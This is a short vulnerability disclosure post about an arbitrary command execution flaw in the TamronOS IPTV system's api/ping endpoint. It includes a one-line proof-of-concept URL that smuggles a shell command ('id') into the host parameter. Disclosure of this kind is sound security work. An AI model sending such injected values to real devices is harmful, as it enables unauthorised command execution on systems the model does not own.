Post

Tamronos Iptv System Ping Arbitrary Command Execution Vulnerability

Tamronos Iptv System Ping Arbitrary Command Execution Vulnerability

TamronOS IPTV system ping arbitrary command execution vulnerability

Vulnerability Description

TamronOS IPTV system api/ping has arbitrary command execution vulnerability, and an attacker can execute any command through the vulnerability.

Vulnerability Impact

TamronOS IPTV system

Network surveying and mapping

Vulnerability reappears

The login page is as follows

img

The vulnerability POC is

/api/ping?count=5&host=;id;

img

This post is licensed under CC BY 4.0 by the author.